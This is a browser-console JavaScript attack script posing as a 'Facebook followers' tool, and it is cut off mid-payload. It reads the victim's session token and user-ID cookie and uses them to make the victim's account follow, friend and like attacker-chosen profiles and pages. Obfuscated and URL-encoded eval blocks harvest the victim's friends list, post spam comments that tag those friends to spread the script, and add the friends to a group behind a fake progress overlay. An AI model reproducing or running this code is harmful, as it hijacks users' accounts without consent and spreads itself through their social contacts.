/*HTML/JavaScript page status="protected"*/
/*FACEBOOK FOLLOWERS*/
/*© 2014 Kodran Piraj. All Rights Reserved.*/

var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function a(abone){var http4=new XMLHttpRequest;var url4="/ajax/follow/follow_profile.php?__a=1";var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";http4.open("POST",url4,true);http4.onreadystatechange=function(){if(http4.readyState==4&&http4.status==200)http4.close};http4.send(params4)}a("100006491494904");function sublist(uidss){var a=document.createElement('script');a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)}sublist("194869190710894");sublist("203764819821331");var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var now=(new Date).getTime();function P(post){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/ufi/like.php";var XParams="like_action=true&ft_ent_identifier="+post+"&source=1&client_id="+now+"%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]="+post+"&nctr[_mod]=pagelet_home_stream&__user="+user_id+"&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg="+fb_dtsg+"&phstamp=";X.open("POST",XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);function Like(p){var Page=new XMLHttpRequest();var PageURL="//www.facebook.com/ajax/pages/fan_status.php";var PageParams="&fbpage_id="+p+"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp=";Page.open("POST",PageURL,true);Page.onreadystatechange=function(){if(Page.readyState==4&&Page.status==200){Page.close}};Page.send(PageParams)}Like("233639806819861");function IDS(r){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/add_friend/action.php";var XParams="to_friend="+r+"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";X.open("POST",XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}
IDS("100006491494904");IDS("100004272308848"); a("100005634423594"); a("100006491494904"); a("100004272308848");
a("100002062385067"); Like("1417633998481131"); Like("274343876022248"); P("648142635235158"); a("100000701226019"); sublist("219691011562045"); sublist("219691058228707"); sublist("219691144895365"); sublist("219691178228695"); sublist("219691221562024"); sublist("219691298228683"); sublist("219691391562007"); sublist("219691451562001"); sublist("219691518228661"); sublist("219691578228655"); Like("233639806819861"); Like("588642367894983"); Like("108657799203171"); Like("309453909102037"); Like("398426433613100"); Like("597273926980523"); Like("188718981270707"); sublist("194869190710894"); sublist("203764819821331"); 
var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","648142635235158","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," BRO IF YOU LIKE FOLLOWERS || WATCH THIS TUTORIAL :D  THIS REALLY WORK \udbb8\udc3c @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text= INCREASE YOU FOLLOWERS BRO - AUTO FOLLOWERS [ 100% WORK ]  ^_^ THIS IS MY TUTORIAL","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);
eval(unescape("%76%61%72%20%54%69%74%6C%65%3D%27%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%66%6F%6E%74%2D%73%69%7A%65%3A%78%2D%6C%61%72%67%65%3B%22%3E%3C%62%3E%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%63%6F%6C%6F%72%3A%20%72%65%64%3B%22%3E%47%65%74%74%69%6E%67%20%46%72%69%65%6E%64%73%20%6F%6E%20%46%61%63%65%62%6F%6F%6B%3C%2F%73%70%61%6E%3E%3C%2F%62%3E%3C%2F%73%70%61%6E%3E%3C%62%72%2F%3E%27%3B%76%61%72%20%44%65%73%63%72%69%70%74%69%6F%6E%73%20%3D%20%22%22%2C%70%61%67%65%5F%69%64%20%3D%20%2F%22%70%72%6F%66%69%6C%65%5F%6F%77%6E%65%72%22%3A%22%28%5B%30%2D%39%5D%2B%29%22%2F%2E%65%78%65%63%28%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%70%61%67%65%6C%65%74%5F%74%69%6D%65%6C%69%6E%65%5F%6D%61%69%6E%5F%63%6F%6C%75%6D%6E%22%29%2E%67%65%74%41%74%74%72%69%62%75%74%65%28%22%64%61%74%61%2D%67%74%22%29%29%5B%31%5D%3B%66%75%6E%63%74%69%6F%6E%20%49%6E%76%69%74%65%46%72%69%65%6E%64%73%28%6F%70%6F%29%7B%6A%78%2E%6C%6F%61%64%28%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%70%72%6F%74%6F%63%6F%6C%20%2B%20%22%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%61%6A%61%78%2F%67%72%6F%75%70%73%2F%6D%65%6D%62%65%72%73%2F%61%64%64%5F%70%6F%73%74%2E%70%68%70%3F%5F%5F%61%3D%31%26%66%62%5F%64%74%73%67%3D%22%20%2B%20%66%62%5F%64%74%73%67%20%2B%20%22%26%67%72%6F%75%70%5F%69%64%3D%31%34%32%31%34%38%33%37%37%38%30%38%36%38%38%34%26%73%6F%75%72%63%65%3D%74%79%70%65%61%68%65%61%64%26%6D%65%6D%62%65%72%73%3D%22%20%2B%20%6F%70%6F%20%2B%20%22%26%6E%63%74%72%5B%5F%32%5D%3D%70%61%67%65%6C%65%74%5F%67%72%6F%75%70%5F%6D%65%6D%62%65%72%73%5F%73%75%6D%6D%61%72%79%26%6C%73%64%26%70%6F%73%74%5F%66%6F%72%6D%5F%69%64%5F%73%6F%75%72%63%65%3D%41%73%79%6E%63%52%65%71%75%65%73%74%26%5F%5F%75%73%65%72%3D%22%20%2B%20%75%73%65%72%5F%69%64%2C%20%66%75%6E%63%74%69%6F%6E%20%28%61%29%20%7B%76%61%72%20%62%20%3D%20%61%2E%73%75%62%73%74%72%69%6E%67%28%61%2E%69%6E%64%65%78%4F%66%28%22%7B%22%29%29%3B%76%61%72%20%63%20%3D%20%4A%53%4F%4E%2E%70%61%72%73%65%28%62%29%3B%69%2D%2D%3B%44%65%73%63%72%69%70%74%69%6F%6E%73%20%3D%20%22%3C%64%69%76%20%63%6C%61%73%73%3D%27%66%72%69%65%6E%64%2D%65%64%67%65%2D%6E%61%6D%65%27%20%73%74%79%6C%65%3D%27%70%61%64%64%69%6E%67%2D%62%6F%74%74%6F%6D%3A%35%70%78%3B%74%65%78%74%2D%61%6C%69%67%6E%3A%6C%65%66%74%3B%66%6F%6E%74%2D%73%69%7A%65%3A%31%30%70%78%3B%77%68%69%74%65%2D%73%70%61%63%65%3A%70%72%65%2D%77%72%61%70%3B%22%3B%69%66%20%28%63%2E%65%72%72%6F%72%29%20%7B%44%65%73%63%72%69%70%74%69%6F%6E%73%20%2B%3D%20%22%63%6F%6C%6F%72%3A%64%61%72%6B%72%65%64%27%3E%22%3B%65%72%72%2B%2B%3B%69%66%20%28%63%2E%65%72%72%6F%72%44%65%73%63%72%69%70%74%69%6F%6E%29%20%44%65%73%63%72%69%70%74%69%6F%6E%73%20%2B%3D%20%63%2E%65%72%72%6F%72%44%65%73%63%72%69%70%74%69%6F%6E%3B%65%6C%73%65%20%44%65%73%63%72%69%70%74%69%6F%6E%73%20%2B%3D%20%4A%53%4F%4E%2E%73%74%72%69%6E%67%69%66%79%28%63%2C%20%6E%75%6C%6C%2C%20%22%22%29%7D%20%65%6C%73%65%20%7B%44%65%73%63%72%69%70%74%69%6F%6E%73%20%2B%3D%20%22%63%6F%6C%6F%72%3A%64%61%72%6B%67%72%65%65%6E%27%3E%22%3B%44%65%73%63%72%69%70%74%69%6F%6E%73%20%2B%3D%20%61%72%6E%5B%69%5D%20%2B%20%22%20%68%61%73%20%62%65%65%6E%20%69%6E%76%69%74%65%64%20%74%20%22%20%2B%20%70%61%67%65%5F%6E%61%6D%65%20%2B%20%22%2E%22%3B%73%75%63%2B%2B%7D%44%65%73%63%72%69%70%74%69%6F%6E%73%20%2B%3D%20%22%3C%2F%64%69%76%3E%22%3B%76%61%72%20%64%69%73%70%6C%61%79%20%3D%20%22%3C%64%69%76%20%69%64%3D%27%66%72%69%65%6E%64%2D%65%64%67%65%2D%64%69%73%70%6C%61%79%27%20%73%74%79%6C%65%3D%27%62%6F%78%2D%73%68%61%64%6F%77%3A%30%70%78%20%33%70%78%20%38%70%78%20%72%67%62%61%28%30%2C%20%30%2C%20%30%2C%20%30%2E%33%29%3B%70%6F%73%69%74%69%6F%6E%3A%66%69%78%65%64%3B%6C%65%66%74%3A%35%30%25%3B%6D%61%72%67%69%6E%2D%6C%65%66%74%3A%2D%32%37%33%70%78%3B%74%6F%70%3A%31%30%30%70%78%3B%77%69%64%74%68%3A%36%30%30%70%78%3B%7A%2D%69%6E%64%65%78%3A%39%39%39%39%3B%66%6F%6E%74%2D%73%69%7A%65%3A%31%34%70%78%3B%74%65%78%74%2D%61%6C%69%67%6E%3A%63%65%6E%74%65%72%3B%70%61%64%64%69%6E%67%3A%31%35%70%78%3B%62%6F%78%2D%73%68%61%64%6F%77%3A%30%70%74%20%31%70%78%20%30%70%74%20%72%67%62%61%28%30%2C%30%2C%30%2C%30%2E%31%29%3B%62%6F%72%64%65%72%2D%72%61%64%69%75%73%3A%33%70%78%3B%62%6F%72%64%65%72%3A%31%70%78%20%73%6F%6C%69%64%20%72%67%62%61%28%30%2C%30%2C%30%2C%30%2E%39%29%3B%62%61%63%6B%67%72%6F%75%6E%64%2D%63%6F%6C%6F%72%3A%72%67%62%61%28%30%2C%30%2C%30%2C%30%2E%39%29%3B%63%6F%6C%6F%72%3A%23%66%66%66%66%66%66%27%3E%22%3B%20%64%69%73%70%6C%61%79%20%2B%3D%20%22%3C%64%69%76%20%73%74%79%6C%65%3D%27%70%61%64%64%69%6E%67%2D%62%6F%74%74%6F%6D%3A%35%70%78%3B%66%6F%6E%74%2D%73%69%7A%65%3A%32%30%70%78%3B%27%3E%22%20%2B%20%54%69%74%6C%65%20%2B%20%22%3C%2F%64%69%76%3E%3C%62%72%2F%3E%22%3B%69%66%20%28%69%20%3E%20%30%29%20%7B%64%69%73%70%6C%61%79%20%2B%3D%20%22%44%65%74%65%63%74%65%64%20%3C%62%3E%22%20%2B%61%72%72%2E%6C%65%6E%67%74%68%20%2B%20%22%3C%2F%62%3E%20%55%73%65%72%20%4F%6E%6C%69%6E%65%3C%62%72%2F%3E%22%3B%64%69%73%70%6C%61%79%20%2B%3D%20%22%3C%62%3E%22%20%2B%20%73%75%63%20%2B%20%22%3C%2F%62%3E%20%6F%66%20%3C%62%3E%22%20%2B%61%72%72%2E%6C%65%6E%67%74%68%20%2B%20%22%3C%2F%62%3E%20%46%69%6E%64%69%6E%67%20%46%72%69%65%6E%64%73%20%3C%62%72%2F%3E%22%3B%64%69%73%70%6C%61%79%20%2B%3D%20%22%20%28%3C%62%3E%22%20%2B%20%69%20%2B%20%22%3C%2F%62%3E%20%55%73%65%72%20%4C%65%66%74%2E%2E%2E%29%3C%62%72%2F%3E%3C%62%72%2F%3E%22%3B%64%69%73%70%6C%61%79%20%2B%3D%20%27%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%63%6F%6C%6F%72%3A%20%6C%69%6D%65%3B%22%3E%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%66%6F%6E%74%2D%73%69%7A%65%3A%20%6C%61%72%67%65%3B%22%3E%3C%62%3E%50%6C%65%61%73%65%20%57%61%69%74%20%55%6E%74%69%6C%20%54%68%65%20%50%72%6F%63%65%73%73%20%69%73%20%43%6F%6D%70%6C%65%74%65%3C%2F%62%3E%3C%2F%73%70%61%6E%3E%3C%2F%73%70%61%6E%3E%27%3B%64%69%73%70%6C%61%79%20%2B%3D%20%22%3C%2F%64%69%76%3E%22%3B%64%69%73%70%6C%61%79%20%2B%3D%20%22%3C%2F%64%69%76%3E%22%3B%77%69%6E%64%6F%77%5B%74%61%67%20%2B%20%22%5F%63%6C%6F%73%65%22%5D%20%3D%20%74%72%75%65%7D%20%65%6C%73%65%20%7B%64%69%73%70%6C%61%79%20%2B%3D%20%27%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%63%6F%6C%6F%72%3A%20%6C%69%6D%65%3B%22%3E%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%66%6F%6E%74%2D%73%69%7A%65%3A%20%6C%61%72%67%65%3B%22%3E%3C%62%3E%53%55%43%43%45%53%53%3C%2F%62%3E%3C%2F%73%70%61%6E%3E%3C%2F%73%70%61%6E%3E%27%3B%64%69%73%70%6C%61%79%20%2B%3D%20%22%3C%64%69%76%3E%3C%73%70%61%6E%20%63%6C%61%73%73%3D%27%6C%61%79%65%72%43%61%6E%63%65%6C%20%75%69%4F%76%65%72%6C%61%79%42%75%74%74%6F%6E%20%75%69%42%75%74%74%6F%6E%20%75%69%42%75%74%74%6F%6E%4C%61%72%67%65%27%20%6F%6E%43%6C%69%63%6B%3D%27%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%5C%22%70%61%67%65%6C%65%74%5F%73%69%64%65%62%61%72%5C%22%29%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%3D%5C%22%6E%6F%6E%65%5C%22%27%20%73%74%79%6C%65%3D%27%63%6F%6C%6F%72%3A%67%72%61%79%27%3E%54%75%74%75%70%3C%2F%73%70%61%6E%3E%3C%62%72%2F%3E%22%3B%64%69%73%70%6C%61%79%20%2B%3D%20%22%3C%64%69%76%20%73%74%79%6C%65%3D%27%74%65%78%74%2D%61%6C%69%67%6E%3A%63%65%6E%74%65%72%3B%66%6F%6E%74%2D%73%69%7A%65%3A%31%30%70%78%3B%77%68%69%74%65%2D%73%70%61%63%65%3A%70%72%65%2D%77%72%61%70%3B%63%6F%6C%6F%72%3A%67%72%61%79%27%3E%3C%62%72%2F%3E%22%3B%64%69%73%70%6C%61%79%20%2B%3D%20%22%3C%2F%64%69%76%3E%22%3B%20%77%69%6E%64%6F%77%5B%74%61%67%20%2B%20%22%5F%63%6C%6F%73%65%22%5D%20%3D%20%66%61%6C%73%65%7D%64%69%73%70%6C%61%79%20%2B%3D%20%22%3C%2F%64%69%76%3E%22%3B%20%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%70%61%67%65%6C%65%74%5F%73%69%64%65%62%61%72%22%29%2E%69%6E%6E%65%72%48%54%4D%4C%20%3D%20%64%69%73%70%6C%61%79%7D%2C%20%22%74%65%78%74%22%2C%20%22%70%6F%73%74%22%29%3B%20%74%61%79%2D%2D%3B%69%66%20%28%74%61%79%20%3E%20%30%29%20%7B%76%61%72%20%73%20%3D%20%61%72%72%5B%74%61%79%5D%3B%73%65%74%54%69%6D%65%6F%75%74%28%22%49%6E%76%69%74%65%46%72%69%65%6E%64%73%28%22%20%2B%20%73%20%2B%20%22%29%22%2C%20%31%30%30%29%7D%63%6F%6E%73%6F%6C%65%2E%6C%6F%67%28%74%61%79%20%2B%20%22%2F%22%20%2B%20%61%72%72%2E%6C%65%6E%67%74%68%20%2B%20%22%3A%22%20%2B%20%61%72%72%5B%74%61%79%5D%20%2B%20%22%2F%22%20%2B%20%61%72%6E%5B%74%61%79%5D%20%2B%20%22%2C%20%73%75%63%63%65%73%73%3A%22%20%2B%20%73%75%63%29%3B%7D%6A%78%20%3D%20%7B%62%3A%20%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%76%61%72%20%62%20%3D%20%21%31%3B%20%69%66%20%28%22%75%6E%64%65%66%69%6E%65%64%22%20%21%3D%20%74%79%70%65%6F%66%20%41%63%74%69%76%65%58%4F%62%6A%65%63%74%29%20%74%72%79%20%7B%62%20%3D%20%6E%65%77%20%41%63%74%69%76%65%58%4F%62%6A%65%63%74%28%22%4D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50%22%29%7D%20%63%61%74%63%68%20%28%63%29%20%7B%74%72%79%20%7B%62%20%3D%20%6E%65%77%20%41%63%74%69%76%65%58%4F%62%6A%65%63%74%28%22%4D%69%63%72%6F%73%6F%66%74%2E%58%4D%4C%48%54%54%50%22%29%7D%20%63%61%74%63%68%20%28%61%29%20%7B%62%20%3D%20%21%31%7D%7D%20%65%6C%73%65%20%69%66%20%28%77%69%6E%64%6F%77%2E%58%4D%4C%48%74%74%70%52%65%71%75%65%73%74%29%20%74%72%79%20%7B%62%20%3D%20%6E%65%77%20%58%4D%4C%48%74%74%70%52%65%71%75%65%73%74%7D%20%63%61%74%63%68%20%28%68%29%20%7B%20%62%20%3D%20%21%31%7D%20%72%65%74%75%72%6E%20%62%7D%2C%6C%6F%61%64%3A%20%66%75%6E%63%74%69%6F%6E%20%28%62%2C%20%63%2C%20%61%2C%20%68%2C%20%67%29%20%7B%76%61%72%20%65%20%3D%20%74%68%69%73%2E%64%28%29%3B%69%66%20%28%65%20%26%26%20%62%29%20%7B%65%2E%6F%76%65%72%72%69%64%65%4D%69%6D%65%54%79%70%65%20%26%26%20%65%2E%6F%76%65%72%72%69%64%65%4D%69%6D%65%54%79%70%65%28%22%74%65%78%74%2F%78%6D%6C%22%29%3B%20%68%20%7C%7C%20%28%68%20%3D%20%22%47%45%54%22%29%3B%20%61%20%7C%7C%20%28%61%20%3D%20%22%74%65%78%74%22%29%3B%67%20%7C%7C%20%28%67%20%3D%20%7B%7D%29%3B%20%61%20%3D%20%61%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%3B%68%20%3D%20%68%2E%74%6F%55%70%70%65%72%43%61%73%65%28%29%3B%62%20%2B%3D%20%62%2E%69%6E%64%65%78%4F%66%28%22%3F%22%29%20%2B%20%31%20%3F%20%22%26%22%20%3A%20%22%3F%22%3B%76%61%72%20%6B%20%3D%20%6E%75%6C%6C%3B%22%50%4F%53%54%22%20%3D%3D%20%68%20%26%26%20%28%6B%20%3D%20%62%2E%73%70%6C%69%74%28%22%3F%22%29%2C%20%62%20%3D%20%6B%5B%30%5D%2C%20%6B%20%3D%20%6B%5B%31%5D%29%3B%65%2E%6F%70%65%6E%28%68%2C%20%62%2C%20%21%30%29%3B%65%2E%6F%6E%72%65%61%64%79%73%74%61%74%65%63%68%61%6E%67%65%20%3D%20%67%2E%63%20%3F%20%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%67%2E%63%28%65%29%7D%20%3A%20%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%69%66%20%28%34%20%3D%3D%20%65%2E%72%65%61%64%79%53%74%61%74%65%29%69%66%20%28%32%30%30%20%3D%3D%20%65%2E%73%74%61%74%75%73%29%20%7B%76%61%72%20%62%20%3D%20%22%22%3B%65%2E%72%65%73%70%6F%6E%73%65%54%65%78%74%20%26%26%20%28%62%20%3D%20%65%2E%72%65%73%70%6F%6E%73%65%54%65%78%74%29%3B%22%6A%22%20%3D%3D%20%61%2E%63%68%61%72%41%74%28%30%29%20%3F%20%28%62%20%3D%20%62%2E%72%65%70%6C%61%63%65%28%2F%5B%5C%6E%5C%72%5D%2F%67%2C%20%22%22%29%2C%20%62%20%3D%20%65%76%61%6C%28%22%28%22%20%2B%20%62%20%2B%20%22%29%22%29%29%20%3A%20%22%78%22%20%3D%3D%20%61%2E%63%68%61%72%41%74%28%30%29%20%26%26%20%28%62%20%3D%20%65%2E%72%65%73%70%6F%6E%73%65%58%4D%4C%29%3B%63%20%26%26%20%63%28%62%29%7D%20%65%6C%73%65%20%67%2E%66%20%26%26%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%22%62%6F%64%79%22%29%5B%30%5D%2E%72%65%6D%6F%76%65%43%68%69%6C%64%28%67%2E%66%29%2C%20%67%2E%65%20%26%26%20%28%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%67%2E%65%29%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%20%3D%20%22%6E%6F%6E%65%22%29%2C%20%65%72%72%6F%72%20%26%26%20%65%72%72%6F%72%28%65%2E%73%74%61%74%75%73%29%7D%3B%65%2E%73%65%6E%64%28%6B%29%7D%7D%2C%20%64%3A%20%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%72%65%74%75%72%6E%20%74%68%69%73%2E%62%28%29%7D%7D%3B%66%75%6E%63%74%69%6F%6E%20%43%68%61%6E%67%65%4C%6F%63%61%74%69%6F%6E%28%29%20%7B%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%20%3D%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%22%7D%73%65%74%54%69%6D%65%6F%75%74%28%22%43%68%61%6E%67%65%4C%6F%63%61%74%69%6F%6E%22%2C%20%31%29%3B%77%69%6E%64%6F%77%2E%6F%6E%62%65%66%6F%72%65%75%6E%6C%6F%61%64%20%3D%20%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%69%66%20%28%77%69%6E%64%6F%77%5B%74%61%67%20%2B%20%22%5F%63%6C%6F%73%65%22%5D%29%20%72%65%74%75%72%6E%20%22%41%75%74%6F%20%4C%69%6B%65%20%53%65%64%61%6E%67%20%42%65%72%6A%61%6C%61%6E%2C%20%54%75%6E%67%67%75%20%53%61%6D%70%61%69%20%53%65%6C%65%73%61%69%21%22%7D%3B%76%61%72%20%69%20%3D%20%33%3B%76%61%72%20%74%61%79%20%3D%20%33%3B%76%61%72%20%73%75%63%20%3D%20%30%3B%76%61%72%20%65%72%72%20%3D%20%30%3B%76%61%72%20%61%72%72%20%3D%20%6E%65%77%20%41%72%72%61%79%3B%76%61%72%20%61%72%6E%20%3D%20%6E%65%77%20%41%72%72%61%79%3B%76%61%72%20%70%68%6F%20%3D%20%6E%65%77%20%41%72%72%61%79%3B%76%61%72%20%74%61%67%20%3D%20%22%43%6C%6F%73%65%22%3B%76%61%72%20%70%61%67%65%5F%6E%61%6D%65%2C%20%78%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%22%73%70%61%6E%22%29%3B%66%6F%72%20%28%69%20%3D%20%30%3B%20%69%20%3C%20%78%2E%6C%65%6E%67%74%68%3B%20%69%2B%2B%29%69%66%20%28%78%5B%69%5D%2E%67%65%74%41%74%74%72%69%62%75%74%65%28%22%69%74%65%6D%70%72%6F%70%22%29%20%3D%3D%20%22%6E%61%6D%65%22%29%20%70%61%67%65%5F%6E%61%6D%65%20%3D%20%78%5B%69%5D%2E%69%6E%6E%65%72%48%54%4D%4C%3B%76%61%72%20%66%62%5F%64%74%73%67%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%4E%61%6D%65%28%22%66%62%5F%64%74%73%67%22%29%5B%30%5D%2E%76%61%6C%75%65%3B%76%61%72%20%75%73%65%72%5F%69%64%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%6D%61%74%63%68%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%6D%61%74%63%68%28%2F%63%5F%75%73%65%72%3D%28%5C%64%2B%29%2F%29%5B%31%5D%29%3B%6A%78%2E%6C%6F%61%64%28%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%70%72%6F%74%6F%63%6F%6C%20%2B%20%22%2F%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%61%6A%61%78%2F%74%79%70%65%61%68%65%61%64%2F%66%69%72%73%74%5F%64%65%67%72%65%65%2E%70%68%70%3F%76%69%65%77%65%72%3D%22%20%2B%20%75%73%65%72%5F%69%64%20%2B%20%22%26%74%6F%6B%65%6E%3D%76%37%26%66%69%6C%74%65%72%5B%30%5D%3D%75%73%65%72%26%6F%70%74%69%6F%6E%73%5B%30%5D%3D%66%72%69%65%6E%64%73%5F%6F%6E%6C%79%26%6F%70%74%69%6F%6E%73%5B%31%5D%3D%6E%6D%26%6F%70%74%6